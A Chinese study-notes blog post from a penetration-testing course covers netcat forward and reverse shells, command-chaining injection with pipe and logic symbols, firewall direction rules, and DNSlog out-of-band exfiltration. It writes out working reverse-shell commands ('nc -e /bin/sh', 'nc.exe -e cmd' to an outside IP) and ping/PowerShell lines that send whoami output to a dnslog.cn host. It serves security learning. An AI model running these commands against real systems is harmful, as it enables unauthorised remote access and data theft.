安全学习基础入门5集

前言:

来源于b站小迪安全v2023第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_哔哩哔哩_bilibili

环境准备:

通过网盘分享的文件:netcat-1.11
链接: https://pan.baidu.com/s/1zgyYvPfbCvfQxoE6aouewA?pwd=hhrb 提取码: hhrb 

第五集内容:

重点是文件下载、无图形化的解决方法,资源网站:棱角社区

文件下载命令

        windows系统

        powershell、certutil、Bitsadmin、msiexec

        linux系统

        wget、curl、python、ruby、perl、java

反弹shell操作

原理:主要用于获取权限后,但是服务器没有交互、回显的情况,解决数据通讯

环境准备:一台linux(192.168.150.170),一台windows系统,装好了nc.exe(192.168.150.78),为内网和内网之间的测试

外网主机:152.12.31.251

正向连接

linux控制windows (linux主动去连接windows服务器)连接对方的ip,就是主动

         linux:nc 192.168.150.78 9090

         windows:nc.exe -e cmd -lvvp 9090

windows控制linux

        windows:nc.exe 192.168.150.170 9090

        linux:nc -e /bin/sh -lvvp 9090

反向连接

linux被windows控制(linux被连接)

        linux:nc -e /bin/sh 192.168.160.78 9090

        windows:nc.exe -lvvp 

windows被linux控制(windows被连接)

        windows:nc.exe -e cmd 192.168.150.170 9090

        linux:nc -lvvp 9090

内网和外网之间的测试,

外网用户控制内网只能用反向连接,外网不能用nc 192.168.150.78 9090

        外网:nc -lvvp 9090

        内网:nc.exe -e cmd 152.12.31.251 5566  

内网控制外网

        正向连接

        外网:nc -e /bin/sh -lvvp 9090

        内网:nc.exe 152.12.31.251 9090

        反向连接

        外网:nc -e /bin/sh 192.168.150.78   这种不行,也就是说

总结内网和外网之间的测试:内网控制外网只能用正向连接,外网控制内网只能用反向连接

管道符:|(管道符号,依次执行命令) ||(逻辑或,前一条命令执行错误,执行后一条) &&(逻辑与,两条命令都正确,才执行) &(后台任务符号,在windows是连接符号,在linux是会一直执行&前面的命令,除非用ps看进程,然后kill杀掉)

windows:|   &   ||   &&

linux:;   ||   &   &&   ``(特有 `` 和; )

两条命令都执行

ping 127.0.0.1 | whoami

ping 127.0.0.1 || whoami (前面为真,不执行后面的)

ping 127.0.0.1 && whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1  `whoami`

ping  `whoami`

防火墙策略

入站限制9090,出站宽松

        主动给出去,外面的监听就好了,相当于上面的外网控制内网的一样

如果设置了出站的限制了,但是入站如果没有设置放行,默认也是不能运行任何流量进入的

        相当于是入站严格,出站宽松的原理(我们设置了出站严格,那么本身入站也是严格的)

有漏洞,但是没有回显(前面的是)

利用dnslog进行带外操作

        利用ping带外的地址(dnslog),然后dnslog就会返回那个ip地址,顺便把命令执行了

        linux可以执行,ping `whoami`+带外ip,就会执行whoami的结果,顺便将结果带回来了,带          给了dnslog

        windows不可以执行  ``,但是windows里cmd的powershell可以赋值变量,然后可以间接的将          结果带出来

windows的带外操作(因为不能直接在cmd命令行上使用,所以要切换powershell版)

win+r打开命令行,使用命令:powershell,切换

        $a = whoami

        $b = '.ubt2xs.dnslog.cn'

        $c = $a + $b;

        $x = $c.replace('\','xxxx');

        ping $x;

linux版(就用``就可以外带了,因为linux支持``)

ping `whoami`+.外带地址

        例如:ping `whoami`.caiuz4.dnslog.cn

由于我服务器ping了没反应,不知道是不是只能国内的服务器ping?有点奇怪,但理论是没有问题的

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值